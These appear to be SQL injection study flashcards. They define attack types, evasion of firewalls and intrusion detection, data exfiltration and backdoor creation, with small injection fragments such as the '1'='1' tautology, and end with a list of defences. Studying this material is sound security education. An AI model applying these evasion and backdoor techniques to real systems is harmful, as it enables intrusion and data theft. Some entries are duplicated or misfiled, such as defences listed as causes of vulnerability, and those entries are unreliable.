15 - SQL Injection Flashcards
What is SQL Injection?
A technique used to take advantage of un-sanitized input to pass SQL commands through a web app for execution by a backend database. It is used to either gain unauthorized access or retrieve info directly from a DB.
What kind of attacks can SQL injection be used to implement?
- Authentication Bypass: An attacker logs into app without providing valid creds and gains admin privileges
- Information Disclosure: An attacker obtains sensitive info that is stored in the database.
- Compromised Data Integrity: Attacker uses this attack to deface/insert data on a web page or alter contents of a database.
- Compromised Availability of Data: Attackers use this to delete the database info or logs or audit info in a database.
- Remote Code Execution: It assists an attacker to compromise the host OS.
What type of databases are susceptible to SQL-Injection attacks?
Relational databases.
What is an HTTP Post request?
The POST request carries the requested data as a part of the message body. The string that is submitted to the web server is visible in the body of the HTTP or HTTPS POST request.
What is a SQL query?
A SQL command that is constructed to interact with a backend SQL database.
How does a SQL injection query exploit the normal execution of SQL?
The attacker is able to exploit the application’s inability to filter the request.
What are the main types of SQL Injection?
- In-Band SQL Injection: Where an attacker uses the same communication channel to perform the attack and retrieve the results.
- Blind/Inferential SQL Injection: When there aren’t SQL error messages to work with, an attacker just sends queries and use boolean results to determine structure of DB and data. One step further, when data is not returned through the app, an attacker just sends queries “blindly”
- Out-of-Band SQL Injection: When an attacker uses different communication channels to perform attack and obtain the result
What are the types of In-Band SQL Injection?
- Error-Based SQL Injection: Attackers intentionally throw bad data into the app in order to receive database errors.
- System Stored Procedure: DB’s stored procedures are exploited.
- Illegal/Logically Incorrect Query: Attackers throw bad queries into database in order to receive database errors.
- Union SQL Injection: Attackers use a UNION clause in order to join a forged query to original query.
- Tautology: Attackers always inject statements that are true so they always return results upon evaluation of a WHERE condition. (‘1’=’1’)
- End of Line Comment: After injecting code into a particular field, legit code is nullified by end of line comments. (“–”)
- Inline Comment: Attackers integrate multiple vulnerable inputs into a single query using inline comments.
- Piggybacked Query: Attackers inject additional malicious query to the original query.
What is a Time-based SQL injection?
A way for attackers to check if a True/False statement is True. This way gets around the Generic error message response so attackers can extract data.
What is Boolean Exploitation?
Where an attacker sends multiple True/False statements (one that they know is true or false) and compare the results to determine if there expression was True or False.
What is a Heavy Query?
A query that retrieves a huge amount of data and in turn, will take a lot of time to execute by using multiple joins. This type of attack is a type of Time-based attack?
What are the steps of the SQL Injection Methodology?
- Information Gathering and SQL Injection Vulnerability Detection
- Launch SQL Injection Attacks
- Advanced SQL Injection
What type of steps are taken in the SQL Injection Info Gathering stage?
Check if web app connects to a DB server, list all input fields, hidden fields, and post requests. Attempt to inject codes to generate errors and evaluate the data in the error messages. Use a string in a number field and vice versa, use a UNION operator to combine the result-set of tow or more SELECT statements.
What are the steps of the SQL Injection Methodology?
- Information Gathering and SQL Injection Vulnerability Detection
- Launch SQL Injection Attacks
- Advanced SQL Injection
What type of steps are taken in the SQL Injection Info Gathering stage?
Check if web app connects to a DB server, list all input fields, hidden fields, and post requests. Attempt to inject codes to generate errors and evaluate the data in the error messages. Use a string in a number field and vice versa, use a UNION operator to combine the result-set of tow or more SELECT statements.
What type of information is extracted through error messages?
It gives you OS, DB system, DB type and version, privilege version, OS interaction level, etc.
What are some ways to generate some errors?
- Parameter tampering
- Injections
- Grouping Error
- Try to insert string into numeric fields
- Blind Injection
- Determine DB Engine Type
- Determining a SELECT Query Structure
What are some methods to detect SQL injection?
- Function Testing: where a software or system is tested against a set of inputs according to the end user’s need. Requires no knowledge of the inner design of the code or logic.
- Fuzzing Testing: Inputting large amounts of random data and observing the changes in the output.
- Static/Dynamic Testing: Analysis of web app code.
What is Black Box Testing?
Where the attacker does not need to have any knowledge about the network or the system to be tested.
What are the steps involved in Black Box pen testing?
- Detecting SQL Injection Issues: Send single or double quotes to detect if input is not sanitized.
- Detecting Input Sanitization: Use right square bracket “]” to catch where user input is used as part of an SQL identifier.
- Detecting Truncation Issues: Send long strings of data to detect buffer overruns
- Detecting SQL Modification: send long strings of right square brackets, double quotes, or single quotes
What are the types of Source Code analysis?
- Static Code Analysis: Analyzing source code without executing
- Dynamic Code Analysis: Code analysis at runtime.
What are the steps for performing union SQL Injection?
Extract database name, extract database table, extract Table column names, extract 1st field data.
What is a Second-Order SQL Injection?
Where the attacker inputs a SQL query into a backend database via an HTTP request and it is stored as data. Another request is submitted where the first request data is executed as a query from within.
How can a firewall be bypassed with SQL injection?
- Normalization Method: Attacker changes structure of SQL query to perform attack.
- HPP and HPF Techniques: HTTP Parameter Pollution (HPP) and HTTP Parameter Fragmentation (HPF) are used to inject delimiting characters in query strings.
- Blind SQL Injection: Technique used to replace WAF signatures with their synonyms by using SQL functions.
- Signature Bypass: Attackers transform the signature of SQL queries to bypass the firewalls.
What are some data obtained via enumeration (DB, Table, Column)?
- Identify User Level Privilege
- DB Administrators: Default admin accounts include sa, system, sys, dba, admin, root and many others. The dbo is a user that has implied permissions to perform all activities in the DB.
- Discover DB Structure
- Column Enumeration in DB
What is password grabbing?
Where an attacker grabs passwords from user defined database tables through SQL injection queries and can change, delete, or steal the grabbed password.
How can an attacker transfer a SQL Server database to their own machine?
They can do so by using the OPENROWSET command and by connecting to a remote machine via port 80.
What are the ways to interact with a DB’s OS?
- Reading and writing system files from disk.
- Direct command execution via remote shell.
What are some MySQL functions that can interact with the file system?
- LOAD_FILE(): used to read and return the contents of a file located within the MYSQL server.
- OUTFILE(): often used to run a query and dump the results into a file.
How can someone access the admin panel of a website?
By utilizing Google dorks, or specialized search terms, at the end of URLs. such as:
- Index.php
- Admin.php
- Login.asp
- adminlogin.aspx
What are some methods for exploiting PL/SQL?
- Exploiting Quotes
- PL/SQL Procedure
- Exploitation by Truncation: Using inline comments to bypass certain parts of SQL statement
What are the different methods of creating server backdoors using SQL Injection?
- Getting OS Shell: Using Outfile to create a PHP shell on the server, by finding the directory structure, and using buit-in DBMS functions.
- Creating Database Backdoor: Attackers use/inject triggers (a stored procedure that is automatically invoked and executed in response to certain DB events) to create database backdoors.
What methods do attackers use to evade IDS detection?
- In-Line Comment: Inputs in-line comments between SQL keywords
- Char Encoding: Uses built in CHAR function to represent a character
- String Concatenation: Concats text to create SQL keyword using DB specific instructions
- Obfuscated Codes: Obscuring code to make difficult to understand
- Manipulating White Spaces: Drops white space between SQL keywords
- Hex Encoding: Uses hex to represent a SQL query string.
- Sophisticated Matches: Uses alternative expression of “OR 1=1”
- URL Encoding: Adds percent sign before each code point
- Case Variation: Mixes upper and lower case to obscure
- Null Byte: Uses null byte (%00) character prior to a string in order to bypass detection mechanism.
- Declare Variables: Uses a variable to pass a SQL statement and bypass detection
- IP Fragmentation: Fragments packets in order to bypass detection
Why are web apps vulnerable to SQL injection attacks?
- The database server runs OS commands
- Using privilege account to connect to the database
- Error message revealing important info
- No data validation
- Minimizing privileges
- Implementing Consistent Coding Standards
- Firewalling the SQL Server
How can you defend against SQL injection attacks?
- Make no assumptions about how your data supposed to be when received from your app
- Validate data input
- Enforce limits to prevent buffer overrun
- Test content of strings
- Reject entries that contain binary data, escape sequences, and comment characters
- Implement multiple layers of validation
- Ensure web config files for each app do not contain sensitive info
- Use most restrictive SQL account types for apps
- Use intrusion detection techniques to monitor injection attacks
- Perform automated testing and analysis
- Keep untrusted data separate from commands and queries
- Eliminate special characters by the interpreter
- Use secure hash algo to store passwords
- Use data access abstraction layer to enforce secure data access across entire app
- Apply least privilege rule to run the apps that access DBMS
- Use regular expressions and stored procedures to detect potentially harmful code
- Lock web server in different domain
- Patch regularly
- Monitor SQL statements from DB connected apps
- Disable shell access to the database
- Do not disclose DB error info to the end users
What is HTTP Header-Based SQL Injection?
Using HTTP headers to inject SQL queries into a server.
- X-Forwarded-For: Field used to identify IP of client system
- User-Agent: Field that includes info about user agent who initiated HTTP request
- Referer: HTTP header that is vulnerable as the application stores the input in the database without sanitization
What is DNS Exfiltration using SQLi?
Attackers embed the output of a malicious SQL query in a DNS request and capture the DNS response sent by the server.
